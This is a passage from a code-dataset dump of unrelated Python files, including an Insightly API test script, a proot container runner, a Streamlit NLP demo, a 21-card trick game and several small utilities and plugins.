pipelines is not None:\n pipeline_id = pipelines[0]['PIPELINE_ID']\n pipeline = i.read('pipelines', pipeline_id)\n \n pipeline_stages = i.read('pipelinestages')\n if pipeline_stages is not None:\n stage_id = pipeline_stages[0]['STAGE_ID']\n pipeline_stage = i.read('pipelinestages', stage_id)\n \n projects = i.read('projects')\n if projects is not None:\n project_id = projects[0]['PROJECT_ID']\n project = i.read('projects', project_id)\n project = 
i.create('projects', {'PROJECT_NAME':'Foo Corporation','STATUS':'Not Started'})\n if project is not None:\n project_id = project['PROJECT_ID']\n project['PROJECT_NAME']='Barzle Corporation'\n project = i.update('projects', project)\n i.upload_image('projects', project_id, 'apollo17.jpg')\n i.delete('projects', project_id, sub_type='image')\n i.create_child('projects', project_id, 'tags', {'TAG_NAME':'foo'})\n i.delete('projects', project_id, sub_type='tags', sub_type_id='foo')\n notes = i.read('projects', project_id, sub_type='notes')\n i.create_child('projects', project_id, 'notes', {'TITLE':'Foo','BODY':'This is the body'})\n events = i.read('projects', project_id, sub_type='events')\n file_attachments = i.read('projects', project_id, sub_type='fileattachments')\n i.create_child('projects', project_id, 'follow', {})\n i.delete('projects', project_id, sub_type='follow')\n milestones = i.read('projects', project_id, sub_type='milestones')\n tasks = i.read('projects', project_id, sub_type='tasks')\n emails = i.read('projects', project_id, sub_type='emails')\n email = i.read('projects', project_id, sub_type='linkemailaddress')\n i.delete('projects', project_id, sub_type='pipeline')\n i.delete('projects', project_id)\n relationships = i.read('relationships')\n tags = i.read('tags?record_type=contacts')\n task_categories = i.read('taskcategories')\n tasks = i.read('tasks')\n if tasks is not None:\n task_id = tasks[0]['TASK_ID']\n task = i.read('tasks', task_id)\n users = i.read('users')\n if users is not None:\n user_id = users[0]['USER_ID']\n user = i.read('users', user_id)\n else:\n user_id = None\n me = i.read('users/me')\n if user_id is not None:\n task = i.create('tasks', {'TITLE':'Test','STATUS':'Not Started','COMPLETED':'False','PUBLICLY_VISIBLE':'True','RESPONSIBLE_USER_ID':str(user_id)})\n if task is not None:\n task['TITLE'] = task['TITLE'] + 'foo'\n task_id = task['TASK_ID']\n task = i.update('tasks', task)\n i.create_child('tasks', task_id, 'follow', {})\n i.delete('tasks', task_id, sub_type='follow')\n comments = i.read('tasks', task_id, sub_type='comments')\n i.delete('tasks', task_id)\n team_members = i.read('teammembers')\n if team_members is not None:\n team_member_id = team_members[0]['PERMISSION_ID']\n team_member = i.read('teammembers', team_member_id)\n \n teams = i.read('teams')\n if teams is not None:\n team_id = teams[0]['TEAM_ID']\n team = i.read('teams', team_id)\n team = i.create('teams',{'TEAM_NAME':'Team Foo','ANONYMOUS_TEAM':'False'})\n if team is not None:\n team_id = team['TEAM_ID']\n team['TEAM_NAME'] = 'Team Bar'\n team = i.update('teams', team)\n i.delete('teams', team_id)\n \n #\n # Next, create a few objects, add links between them, and then delete them\n #\n \n contact_id = None\n organisation_id = None\n project_id = None\n opportunity_id = None\n \n contact = i.create('contacts',{'FIRST_NAME':'Foo','LAST_NAME':'Bar'})\n if contact is not None:\n contact_id = contact['CONTACT_ID']\n organisation = i.create('organisations',{'ORGANISATION_NAME':'Foo Corporation'})\n if organisation is not None:\n organisation_id = organisation['ORGANISATION_ID']\n project = i.create('projects',{'PROJECT_NAME':'Foo Corporation','Status':'Not Started'})\n if project is not None:\n project_id = project['PROJECT_ID']\n opportunity = i.create('opportunities',{'OPPORTUNITY_NAME':'Foo Corporation','OPPORTUNITY_STATE':'Open'})\n if opportunity is not None:\n opportunity_id = opportunity['OPPORTUNITY_ID']\n \n contact = i.create_child('contacts', contact_id, 'links', 
{'ORGANISATION_ID':organisation_id})\n organisation = i.create_child('organisations', organisation_id, 'links', {'PROJECT_ID':project_id})\n project = i.create_child('projects', project_id, 'links', {'ORGANISATION_ID':organisation_id})\n opportunity = i.create_child('opportunities', opportunity_id, 'links', {'CONTACT_ID':contact_id})\n \n if contact_id is not None:\n i.delete('contacts', contact_id)\n if organisation_id is not None:\n i.delete('organisations', organisation_id)\n if project_id is not None:\n i.delete('projects', project_id)\n if opportunity_id is not None:\n i.delete('opportunities', opportunity_id)\n \n print(str(i.tests_passed) + ' out of ' + str(i.tests_run) + ' passed')\n if len(i.test_failures) > 0:\n print ('')\n print ('Test Failures')\n for f in i.test_failures:\n print (f)","sub_path":"insightlytest.py","file_name":"insightlytest.py","file_ext":"py","file_size_in_byte":17384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602972039","text":"from database import db\nfrom database.models import Event, Tag, Report, User, Funded, VotedTest\nfrom datetime import datetime\nimport pytz\n\nutc = pytz.UTC\n\n\ndef add_event(data, user_creator):\n name = data.get('name')\n description = data.get('description')\n funding_start_date = datetime.strptime(data.get('funding_start_date'), \"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n funding_end_date = datetime.strptime(data.get('funding_end_date'), \"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n goal = data.get('goal')\n event_start_date = datetime.strptime(data.get('event_start_date'), \"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n event_end_date = datetime.strptime(data.get('event_end_date'), \"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n location = data.get('location')\n latitude = data.get('lat')\n if latitude is None:\n latitude = 0.000\n longitude = data.get('long')\n if longitude is None:\n longitude = 0.00\n tags = data.get('tags')\n photo = data.get('photo')\n\n if (funding_start_date < utc.localize(datetime.now())):\n raise Exception(\"The event funding date can not start in the past\")\n if (funding_end_date < utc.localize(datetime.now())):\n raise Exception(\"The event funding date can not end in the past\")\n if (funding_start_date > funding_end_date):\n raise Exception(\"Start funding date is after end funding date\")\n if (event_start_date < utc.localize(datetime.now())):\n raise Exception(\"The event can not start in the past\")\n if (event_end_date < utc.localize(datetime.now())):\n raise Exception(\"The event can not end in the past\")\n if (event_start_date > event_end_date):\n raise Exception(\"Start date is after end date\")\n\n new_event = Event(name, description, funding_start_date, funding_end_date, goal, event_start_date, event_end_date,\n location, user_creator, latitude, longitude, photo)\n\n for tag in tags:\n new_tag = Tag(tag)\n new_event.tags.append(new_tag)\n\n db.session.add(new_event)\n db.session.commit()\n\n return new_event.id\n\n\ndef update_event(id, data):\n event = Event.query.get(id)\n event.description = data.get('description')\n event.location = data.get('location')\n event.photo = data.get('photo')\n\n funding_end_date = datetime.strptime(data.get('funding_end_date'), \"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n event_start_date = datetime.strptime(data.get('event_start_date'), \"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n event_end_date = datetime.strptime(data.get('event_end_date'), 
\"%Y-%m-%dT%H:%M:%S.%fZ\").replace(tzinfo=utc)\n\n event.lat = data.get('lat')\n event.long = data.get('long')\n\n if (event_start_date > event_end_date):\n raise Exception(\"Start date is after end date\")\n\n event.event_end_date = event_end_date\n event.event_start_date = event_start_date\n event.funding_end_date = funding_end_date\n\n db.session.add(event)\n db.session.commit()\n\n\ndef delete_event(id):\n event = Event.query.get(id)\n db.session.delete(event)\n db.session.commit()\n return event\n\n\ndef add_report(data, user_id):\n event_id = data.get('event_id')\n content = data.get('content')\n\n new_report = Report(user_id, event_id, content)\n\n db.session.add(new_report)\n db.session.commit()\n\n return new_report.id\n\n\ndef delete_report(id):\n report = Report.query.get(id)\n db.session.delete(report)\n db.session.commit()\n return report\n\n\ndef watch_event(id, data, user_id):\n event = Event.query.get(id)\n user = User.query.get(user_id)\n\n if user in event.watchers:\n event.watchers.remove(user)\n else:\n event.watchers.append(user)\n\n db.session.commit()\n\n\ndef fund_event(id, data, user_id):\n event = Event.query.get(id)\n user = User.query.get(user_id)\n\n test = Funded(fund_amount=data.get('fund_amount'))\n\n test.backed = user\n test.backers = event\n\n event.backers.append(test)\n db.session.commit()\n\n\ndef vote_event(id, data, user_id):\n\n event = Event.query.get(id)\n user = User.query.get(user_id)\n\n test = VotedTest(stars=data.get('stars'))\n\n test.voted = user\n test.votes = event\n\n event.votes.append(test)\n db.session.commit()\n\n\ndef get_info_events(events):\n\n if type(events) != list:\n user = User.query.filter(User.id == events.user_creator).one()\n events.__dict__['user_creator_name'] = user.name\n return events\n\n result = []\n for event in events:\n user = User.query.filter(User.id == event.user_creator).one()\n event.__dict__['user_creator_name'] = user.name\n result.append(event)\n\n return result\n","sub_path":"api/events/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"554259161","text":"import logging\n\nimport SMS.config\n\nCONF = SMS.config.CONF\n\n\ndef get_logger():\n return logging.getLogger('SMS')\n\n\ndef configure_logging():\n log_level = logging.DEBUG if CONF.log.debug else logging.INFO\n formatter = logging.Formatter(CONF.log.log_format)\n\n logger = get_logger()\n logger.setLevel(log_level)\n\n def add_handler(h):\n h.setFormatter(formatter)\n h.setLevel(log_level)\n logger.addHandler(h)\n\n if CONF.log.console_log:\n handler = logging.StreamHandler()\n add_handler(handler)\n\n if CONF.log.log_file:\n handler = logging.FileHandler(CONF.log.log_file)\n add_handler(handler)\n","sub_path":"SMS/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"383887451","text":"import argparse\nimport json\n\n\ndef parse_template(template, **template_values):\n print(\">>>>\", template.format(**template_values))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--settings\")\n\n args = parser.parse_args()\n config = json.loads(args.settings)\n template = config.get(\"template\")\n template_values = config.get(\"template_values\")\n\n parse_template(template, **template_values)\n\n\n\"\"\"\n------- command 
---------\n{\"template\":\"{bucket}/{prefix}/{database}/{schema}\",\"template_values\":{\"bucket\":\"eda0x7b2263-sbx-eu-west-1\",\"prefix\":\"breaking20\",\"database\":\"DTC_BI_DM\",\"schema\":\"dbo\"}}\n\npython3 templating.py --settings '{\"template\":\"{bucket}/{prefix}/{database}/{schema}\",\"template_values\":{\"bucket\":\"eda0x7b2263-sbx-eu-west-1\",\"prefix\":\"breaking20\",\"database\":\"DTC_BI_DM\",\"schema\":\"dbo\"}}'\n \n\n========== example ======\ntemplate = \"Hello, my name is {name}, today is {date} and the weather is {weather}\"\nfields = {'name': 'Michael', 'date': '21/06/2015', 'weather': 'sunny'}\ntemplate.format(**fields)\n\"\"\"\n","sub_path":"Python/playground/templating.py","file_name":"templating.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"10124375","text":"# - * - coding:utf8 - * - -\n###########################################\n# Author: Tinkle\n# E-mail: shutingnupt@gmail.com\n# Name: Climbing Stairs.py\n# Creation Time: 2017/7/10\n###########################################\n'''\nYou are climbing a stair case. It takes n steps to reach to the top.\n\nEach time you can either climb 1 or 2 steps. In how many distinct ways can you climb to the top?\n'''\nclass Solution(object):\n def climbStairs(self, n):\n #s[n]=s[n-1]+s[n-2]\n if n==1 or n==2:\n return n\n i=3;s=[1,2]\n while(i<=n):\n s.append(s[i-2]+s[i-3])\n i=i+1\n return s.pop()","sub_path":"DynamicProgramming/70. Climbing Stairs.py","file_name":"70. Climbing Stairs.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"634369171","text":"#!/usr/bin/python\n\n\nfrom django.template import loader, Context\nfrom yapsy.IPlugin import IPlugin\n\nfrom server.models import PluginScriptRow\n\n\nclass ARDInfo(IPlugin):\n name = \"ARD Info\"\n\n def widget_width(self):\n return 4\n\n def plugin_type(self):\n return 'machine_detail'\n\n def get_description(self):\n return \"Apple Remote Desktop's Computer Information Fields\"\n\n def widget_content(self, page, machine=None, theid=None):\n template = loader.get_template(\n \"machine_detail_ard_info/templates/ard_info.html\")\n\n ard_info = {}\n\n for i in xrange(1, 5):\n key = 'ARD_Info_{}'.format(i)\n row = PluginScriptRow.objects.filter(\n submission__machine=machine,\n submission__plugin='ARD_Info',\n pluginscript_name=key)\n\n try:\n val = row.first().pluginscript_data\n except Exception:\n val = \"\"\n ard_info[key] = val\n\n c = Context({\n \"title\": self.get_description(),\n \"data\": ard_info,\n \"theid\": theid,\n \"page\": page})\n\n return template.render(c)\n","sub_path":"server/plugins/machine_detail_ard_info/ard_info.py","file_name":"ard_info.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120805198","text":"import h5py\nimport numpy as np\nfrom progressbar import ProgressBar\n\nfrom utils import DBI, get_target_collection, get_related_list\n\nrelated_db = DBI().articles_related\narticles_db = DBI().articles\n\nvalid_index = set([doc['index'] for doc in articles_db.find({'target': False},\n {'index': 1})])\norder_valid = {index: i for i, index in enumerate(sorted(list(valid_index)))}\ntarget_index = set([doc['index'] for doc in articles_db.find({'target': True},\n {'index': 1})])\n\nprint(len(valid_index))\n\nf = h5py.File('data_0626/features_y_ndcg_1.hdf5', 
'w')\npbar = ProgressBar(max_value=2000)\nfor index in target_index:\n doc = related_db.find_one({'index': index})\n related = get_related_list(doc['related'], 10, valid_index)\n arr = np.empty((len(valid_index), ))\n arr.fill(np.inf)\n for hop in range(10, 0, -1):\n slice = [order_valid[i] for i in related[hop]]\n arr[slice] = hop\n f.create_dataset(str(doc['index']), data=arr, dtype='i8', compression=\"gzip\")\n pbar.update(pbar.value + 1)\npbar.finish()\nf.flush()\nf.close()\n","sub_path":"source/generate_label_nDCG.py","file_name":"generate_label_nDCG.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45268012","text":"# ChivTeams Plugin for BigBrotherBot(B3) (www.bigbrotherbot.net)\n# Copyright (C) 2015 ph03n1x\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n__version__ = '1.0.0'\n__author__ = 'ph03n1x'\n\nimport b3\nimport b3.events\nimport b3.plugin\n\nclass ChivteamsPlugin(b3.plugin.Plugin):\n requiresParsers = ['chiv']\n\n def onStartup(self):\n #register events\n self.registerEvent('EVT_CLIENT_JOIN', self.onJoin)\n\n #########################################################################################\n # EVENT HANDLING #\n #########################################################################################\n def onJoin(self, event):\n \"\"\"\\\n Handle EVT_CLIENT_JOIN\n \"\"\"\n sclient = event.client\n if sclient.maxLevel >= 20 and sclient.maxLevel != 100:\n if sclient.team == b3.TEAM_SPEC:\n self.debug('%s is spectating. 
Ignoring their team' % sclient.name)\n elif sclient.team == b3.TEAM_BLUE:\n self.info('Forcing %s to red team' % sclient.name)\n self.console.write('AdminChangeTeam %s' % sclient.name)\n sclient.message('^3You can only play on ^1RED ^3team')\n","sub_path":"chivteams.py","file_name":"chivteams.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"481215999","text":"import unittest\nimport sys\n\nmodule = sys.argv[-1].split(\".py\")[0]\n\nclass PublicTests(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n global devedores\n undertest = __import__(module)\n devedores = getattr(undertest, 'devedores', None)\n\n def test_1_vazio(self):\n contas = { 'Ana':1000, 'Antonio':-500, 'William':0, 'Carlos':2500, 'Kate':-1300 }\n assert devedores(contas) == 2\n\nif __name__ == '__main__':\n loader = unittest.TestLoader()\n runner = unittest.TextTestRunner()\n runner.run(loader.loadTestsFromModule(sys.modules[__name__]))\n","sub_path":"atividades/mini_testes/devedores/public_tests.py","file_name":"public_tests.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"377297672","text":"# /psqtraviscontainer/use.py\n#\n# Module which handles the running of scripts and commands inside of a proot\n#\n# See LICENCE.md for Copyright information\n\"\"\" Module which handles the running of scripts inside of a proot.\"\"\"\n\nimport os\n\nimport platform\n\nimport subprocess\n\nimport sys\n\nfrom collections import namedtuple\n\nfrom psqtraviscontainer import architecture\nfrom psqtraviscontainer import common_options\nfrom psqtraviscontainer import constants\nfrom psqtraviscontainer import distro\n\nProotDistribution = namedtuple(\"ProotDistribution\", \"proot qemu\")\n\n\nclass PtraceRootExecutor(object):\n\n \"\"\"For a distro configured a in container, a mechanism to execute code.\"\"\"\n\n def __init__(self, proot_distro, container_root, config, arch):\n \"\"\"Initialize PtraceRootExecutor for container and distro.\"\"\"\n super(PtraceRootExecutor, self).__init__()\n self._proot_distro = proot_distro\n self._container_root = container_root\n self._config = config\n self._arch = arch\n\n def _execute_argv(self, user_argv):\n \"\"\"Get argv to pass to subprocess later.\"\"\"\n distro_dir = distro.get_dir(self._container_root,\n self._config,\n self._arch)\n proot_command = [self._proot_distro.proot(), \"-S\", distro_dir]\n\n # If we're not the same architecture, interpose qemu's emulator\n # for the target architecture as appropriate\n our_architecture = architecture.Alias.universal(platform.machine())\n target_architecture = architecture.Alias.universal(self._arch)\n\n if our_architecture != target_architecture:\n proot_command += [\"-q\", self._proot_distro.qemu(self._arch)]\n\n return proot_command + user_argv\n\n def execute(self, argv, stdout=None, stderr=None):\n \"\"\"Execute the command specified by argv.\n\n Return tuple of (exit status, stdout, stderr).\n \"\"\"\n argv = self._execute_argv(argv)\n executed_cmd = subprocess.Popen(argv,\n stdout=stdout,\n stderr=stderr,\n universal_newlines=True)\n stdout_data, stderr_data = executed_cmd.communicate()\n\n return (executed_cmd.returncode, stdout_data, stderr_data)\n\n def execute_success(self, argv):\n \"\"\"Execute the command specified by argv, throws on failure.\"\"\"\n returncode, stdout_data, stderr_data = self.execute(argv,\n subprocess.PIPE,\n 
subprocess.PIPE)\n\n        if returncode != 0:\n            sys.stderr.write(stdout_data)\n            sys.stderr.write(stderr_data)\n            raise RuntimeError(\"{0} failed with {1}\".format(\" \".join(argv),\n                                                            returncode))\n\n\ndef proot_distro_from_container(container_dir):\n    \"\"\"Return a ProotDistribution from a container dir.\"\"\"\n    path_to_proot_dir = constants.proot_distribution_dir(container_dir)\n    path_to_proot_bin = os.path.join(path_to_proot_dir, \"bin/proot\")\n    path_to_qemu_template = os.path.join(path_to_proot_dir,\n                                         \"bin/qemu-{arch}\")\n\n    def _get_qemu_binary(arch):\n        \"\"\"Get the qemu binary for architecture.\"\"\"\n        qemu_arch = architecture.Alias.qemu(arch)\n        return path_to_qemu_template.format(arch=qemu_arch)\n\n    def _get_proot_binary():\n        \"\"\"Get the proot binary.\"\"\"\n        return path_to_proot_bin\n\n    return ProotDistribution(proot=_get_proot_binary,\n                             qemu=_get_qemu_binary)\n\n\ndef _parse_arguments(arguments=None):\n    \"\"\"Return a parser context result.\"\"\"\n    parser = common_options.get_parser(\"Use\")\n    parser.add_argument(\"--cmd\",\n                        nargs=\"*\",\n                        help=\"Command to run inside of container\",\n                        default=None,\n                        required=True)\n    return parser.parse_args(arguments)\n\n\ndef _check_if_exists(entity):\n    \"\"\"Raise RuntimeError if entity does not exist.\"\"\"\n    if not os.path.exists(entity):\n        raise RuntimeError(\"A required entity {0} does not exist\\n\"\n                           \"Try running psq-travis-container-create \"\n                           \"first before using psq-travis-container-use.\".format(entity))\n\n\ndef main(arguments=None):\n    \"\"\"Select a distro in the container root and run a command in it.\"\"\"\n    result = _parse_arguments(arguments=arguments)\n    distro_config, arch = distro.lookup(result.distro[0],\n                                        result.release[0],\n                                        result.arch[0])\n    required_entities = [\n        constants.have_proot_distribution(result.containerdir[0]),\n        distro.get_dir(result.containerdir[0], distro_config, arch)\n    ]\n\n    for entity in required_entities:\n        _check_if_exists(entity)\n\n    # Now create an executor and run our command\n    proot_distro = proot_distro_from_container(result.containerdir[0])\n    proot_executor = PtraceRootExecutor(proot_distro,\n                                        result.containerdir[0],\n                                        distro_config,\n                                        arch)\n\n    return proot_executor.execute(result.cmd)[0]\n","sub_path":"psqtraviscontainer/use.py","file_name":"use.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"612395757","text":"class Test:\n    def takeInput(self):\n        myText = input(\"Enter the string: \")\n        return myText\n\n    def reversTxt(self, msg):\n        take = msg.split(\" \")\n        take.reverse()\n        print(\" \".join(take))\n\n\ntest = Test()\nword = test.takeInput()\ntest.reversTxt(word)\n","sub_path":"Q12Susheel.py","file_name":"Q12Susheel.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"180765115","text":"import streamlit as st\n\n\n#NLP Packages\nimport spacy\nfrom textblob import TextBlob\nfrom gensim.summarization import summarize\n\n#Sumy Packages\nfrom sumy.parsers.plaintext import PlaintextParser\nfrom sumy.nlp.tokenizers import Tokenizer\nfrom sumy.summarizers.lex_rank import LexRankSummarizer\nimport nltk\nnltk.download('punkt')\n\n#Summary Function\ndef sumy_summarizer(docx):\n\tparser=PlaintextParser.from_string(docx,Tokenizer(\"english\"))\n\tlex_summarizer=LexRankSummarizer()\n\tsummary=lex_summarizer(parser.document,3)\n\tsummary_list=[str(sentence) for sentence in summary]\n\tresult=' '.join(summary_list)\n\treturn result\n\n
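#Text/Entity Analyzer Functions: both load spaCy's small English model on\n#each call; text_analyzer returns token/lemma pairs and entity_analyzer\n#returns the named entities found in the input.\n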
def text_analyzer(my_text):\n\tnlp=spacy.load(\"en_core_web_sm\")\n\tdocx=nlp(my_text)\n\n\ttokens=[token.text for token in docx]\n\tallData=[('\"Tokens\":{},\\n\"Lemma\":{}'.format(token.text,token.lemma_)) for token in docx]\n\treturn allData\n\ndef entity_analyzer(my_text):\n\tnlp=spacy.load(\"en_core_web_sm\")\n\tdocx=nlp(my_text)\n\ttokens=[token.text for token in docx]\n\tentities=[(entity.text,entity.label_) for entity in docx.ents]\n\tdata=[('\"Token\":{}, \\n\"Entity\":{}'.format(tokens,entities))]\n\treturn data\n\n\n#@st.cache\ndef main():\n\t### NLP App with Streamlit ###\n\tst.title(\"NLPiffy Streamlit\")\n\tst.subheader(\"Natural Language Processing On A Go...\")\n\n\t#Named Entity Recognition\n\tif st.checkbox(\"Show Named Entities\"):\n\t\tst.subheader(\"Extract Entities from Your Text\")\n\t\tmessage1=st.text_area(\"Enter Your Text\",\"Type Here\")\n\t\tif st.button(\"Extract\"):\n\t\t\tnlp_result=entity_analyzer(message1)\n\t\t\tst.json(nlp_result)\n\n\n\t#Tokenization\n\tif st.checkbox(\"Show Tokens And Lemma\"):\n\t\tst.subheader(\"Tokenize Your Text\")\n\t\tmessage2= st.text_area(\"Enter Your Text\",\"Type Here\")\n\t\tif st.button(\"Analyze\"):\n\t\t\tnlp_result=text_analyzer(message2)\n\t\t\tst.json(nlp_result)\n\n\t#Sentiment Analysis\n\tif st.checkbox(\"Show Sentiment Analysis\"):\n\t\tst.subheader(\"Sentiment Of Your Text\")\n\t\tmessage3= st.text_area(\"Enter Your Text\",\"Type Here\")\n\t\tif st.button(\"Analyze\"):\n\t\t\tblob=TextBlob(message3)\n\t\t\tresult_sentiment=blob.sentiment\n\t\t\tst.success(result_sentiment)\n\n\n\t#Text Summarization\n\tif st.checkbox(\"Show Text Summarization\"):\n\t\tst.subheader(\"Summarize Your Text\")\n\t\tmessage3= st.text_area(\"Enter Your Text\",\"Type Here\")\n\t\tsummary_options=st.selectbox(\"Choose Your Summarizer\",(\"gensim\",\"sumy\"))\n\t\tif st.button(\"Summarize\"):\n\t\t\tif summary_options=='gensim':\n\t\t\t\tsummary_result=summarize(message3)\n\t\t\telif summary_options=='sumy':\n\t\t\t\tst.text(\"Using Sumy...\")\n\t\t\t\tsummary_result=sumy_summarizer(message3)\n\n\t\t\telse:\n\t\t\t\tst.warning(\"Using Default Summarizer\")\n\t\t\t\tst.text(\"Using Gensim...\")\n\t\t\t\tsummary_result=summarize(message3)\n\n\t\t\tst.success(summary_result)\n\n\tst.sidebar.subheader(\"About the App\")\n\tst.sidebar.text(\"NLPiffy App with Streamlit\")\n\tst.sidebar.info(\"Kudos to Streamlit Team\")\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"392790859","text":"import numpy as np \nimport pandas as pd # handy for displaying tables\nfrom IPython.display import display # used for display\nimport sys # used to exit the program\n\n# Build the deck of 52 playing cards\ndef make_cards52():\n    suit=np.array([\"♠\",\"♡\",\"♦\",\"♣\"],dtype=\"object\") # the four suits ♠,♡,♦,♣\n    number=[\"{:02d}\".format(i) for i in range(1,14)] # the 13 ranks 1-13\n    \n    # generate the 52 cards\n    s=np.repeat(suit,13) # 52 suit marks \n    n=np.array(number*4,dtype=\"object\") # 52 ranks\n    cards52=s+n # 52 [suit, rank] combinations\n    \n    return cards52\n\n# Pick 21 of the cards\ndef choose_cards21(cards52):\n    cards21=cards52[np.random.choice(np.arange(52),21,replace=False)] # pick 21 at random without replacement\n    \n    return cards21\n\n# Reorder the cards\ndef sort_cards21(cards21,column_chosen):\n    cards21_matrix=cards21.reshape(7,3) # arrange as a 7-row, 3-column matrix\n    \n    nc=(column_chosen-1)%3 # the column the user chose\n    numlist=[i for i in range(3)] # list of the three column indices\n    
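# Restacking with the chosen column in the middle, three times in a row,\n    # forces the chosen card into position 11 (index 10) of the 21-card pile,\n    # which is where validate_answer() looks for it.\n    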
nf,nb=list(set(numlist)-set([nc])) # the two columns the user did not choose\n    \n    cf=cards21_matrix[:,nf] # column placed first when stacking\n    cc=cards21_matrix[:,nc] # column placed in the middle when stacking\n    cb=cards21_matrix[:,nb] # column placed last when stacking\n    \n    cards21_sorted=np.concatenate([cf,cc,cb]) # stack front, middle, back\n    \n    return cards21_sorted\n\n# Show the cards\ndef display_cards(cards21):\n    display(pd.DataFrame(cards21.reshape(7,3),columns=[\"Col 1\",\"Col 2\",\"Col 3\"])) # display the 7x3 layout\n    \n# Check that the input is 1-3 and convert it to an int\ndef validate_input(i):\n    # repeat until a well-formed value is entered\n    while True:\n        column_chosen=input(\"Round {}: which column is your card in? Enter a number from 1 to 3: \".format(i+1)) # the column entered\n        \n        if column_chosen in [\"1\",\"2\",\"3\"]: # if a valid 1-3 was entered, convert the str input to an int\n            return int(column_chosen)\n        else: # otherwise show an error message\n            print(\"Error: please enter a number from 1 to 3.\") \n\n# Confirm the answer\ndef validate_answer(cards21):\n    while True: # repeat until a well-formed value is entered\n        answer=input(\"Your card is {}, right? [yes or no] : \".format(cards21[10])) # the user's reply\n        \n        if answer in [\"yes\",\"no\"]: # if yes or no was entered\n            if answer==\"yes\": # on yes\n                return print(\"Told you. [end]\")\n            elif answer==\"no\": # on no\n                print(\"That cannot be. You must have made a mistake. Please start over. [end]\")\n                sys.exit()\n        else: # anything other than yes/no was entered\n            print(\"Please answer 'yes' or 'no'.\")\n\n# main function\ndef main():\n    cards52=make_cards52() # build the 52-card deck\n    cards21=choose_cards21(cards52) # pick 21 cards\n\n    display_cards(cards21) # show them\n    print(\"Pick one card from the layout and remember it.\")\n\n    # repeat three times\n    for i in range(3):\n        column_chosen=validate_input(i) # the column the user chose\n        cards21=sort_cards21(cards21,column_chosen) # restack the cards\n        display_cards(cards21) # show the 21 cards\n    \n    validate_answer(cards21) # reveal the answer\n    \n# run\nif __name__==\"__main__\":\n    main()","sub_path":"card_trick21/21-card_trick.py","file_name":"21-card_trick.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"97201711","text":"\"\"\"\nGiven an array nums and a target value k, find the maximum length of a subarray that sums to k.\nIf there isn't one, return 0 instead.\n\nNote:\nThe sum of the entire nums array is guaranteed to fit within the 32-bit signed integer range.\n\nExample 1:\nInput: nums = [1, -1, 5, -2, 3], k = 3\nOutput: 4\nExplanation: The subarray [1, -1, 5, -2] sums to 3 and is the longest.\n\nExample 2:\nInput: nums = [-2, -1, 2, 1], k = 1\nOutput: 2\nExplanation: The subarray [-1, 2] sums to 1 and is the longest.\n\nFollow Up:\nCan you do it in O(n) time?\n\"\"\"\nclass Solution:\n    def maxSubArrayLen(self, nums, k):\n        \"\"\"\n        :type nums: List[int]\n        :type k: int\n        :rtype: int\n        \"\"\"\n        n = len(nums)\n        presum = dict()  # earliest index at which each prefix sum occurs\n        ret = 0\n        total = 0\n        for i,num in enumerate(nums):\n            total += num\n            if total==k:\n                ret = max(ret, i+1)\n            elif total-k in presum:\n                ret = max(ret, i-presum[total-k])\n            if total not in presum:\n                presum[total] = i  # keep only the earliest occurrence\n        return ret \n","sub_path":"MaximumSizeSubarraySumEqualsk.py","file_name":"MaximumSizeSubarraySumEqualsk.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"475525953","text":"from babel.babel_utils import glom, write_compendium, dump_sets, dump_dicts, get_prefixes, filter_out_non_unique_ids, clean_sets\nfrom babel.onto import Onto\nfrom babel.ubergraph import UberGraph\nfrom 